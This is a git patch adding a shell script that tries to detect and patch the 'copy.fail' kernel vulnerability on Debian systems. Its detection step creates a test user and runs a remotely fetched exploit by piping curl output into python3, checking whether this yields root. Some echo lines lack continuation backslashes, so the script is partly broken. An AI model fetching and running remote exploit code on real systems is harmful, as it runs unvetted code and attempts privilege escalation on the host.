From 1710ac5cdd3dcd546aef6a8dae2e4dc624d75b6c Mon Sep 17 00:00:00 2001 From: corwin Date: Thu, 30 Apr 2026 11:59:44 -0500 Subject: [PATCH] add script to try patching for copy.fail Try to automate detecting and patching for copy.fail on debian/apt systems. For information on the vulnerability please see: https://copy.fail --- fix-copy-fail.sh | 42 ++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 fix-copy-fail.sh diff --git a/fix-copy-fail.sh b/fix-copy-fail.sh new file mode 100644 index 0000000..ad4b09a --- /dev/null +++ b/fix-copy-fail.sh @@ -0,0 +1,42 @@ +#!/usr/bin/sh +# Copyright (c) 2026 Corwin Brust +# +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# You should have received a copy of the GNU General Public License +# along with this program. If not, see . +# + +# Delete the test user if it exists +# NOTE: this make the script repeatable however +# it will still abandon the 'testu' account +# +# To remove the test account after patching: +# deluser testu +# +grep '^testu ' /etc/passwd && deluser testu; + +# Note this may not work all in one shot +# due to the exploit screwing with the kernel +# usermap resident in memory. + +adduser --disabled-password --gecos='""' testu \ + && su testu -c 'cd; curl https://copy.fail/exp | python3 && su -c id' | grep root \ + && echo "EXPLOIT DETECTED: copy.fail FFI, please see: https://copy.fail" \ + && echo + && echo "The system MUST be restarted before confirming the fix." + && echo "If changes are made this should happen automatically but do it manually if that fails." + && echo + && echo "Pausing for ten seconds before attempting to fix.."" + && sleep 10 \ + && echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf \ + && rmmod algif_aead \ + && apt-get update -y && apt-get upgrade -y && apt-get full-upgrade -y && shutdown -r now \ + || echo "Check halted: check above for error messages.\n" \ + "If the only error message you see if from grep you patched for copy.fail."